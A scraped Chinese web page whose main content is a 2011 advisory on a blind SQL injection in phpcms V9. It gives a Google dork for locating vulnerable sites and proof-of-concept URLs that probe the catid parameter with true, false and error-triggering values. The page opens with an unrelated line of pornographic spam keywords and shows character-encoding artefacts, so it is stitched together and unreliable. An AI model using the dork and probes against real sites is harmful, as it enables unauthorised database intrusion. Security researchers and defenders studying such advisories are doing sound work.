亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

phpcms V9 BLind SQL 注入漏洞0day

  發(fā)布時(shí)間:2011-03-11 11:59:15   作者:佚名   我要評(píng)論
  影響版本:phpcms v9 blind  phpcms v9 blind 參數(shù)過濾存在SQL注入漏洞。

  影響版本:phpcms v9 blind

  官方網(wǎng)站:http://www.phpcms.cn

  漏洞類型:SQL注入

  漏洞描述:phpcms v9 blind 參數(shù)過濾存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= True

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

 

相關(guān)文章

最新評(píng)論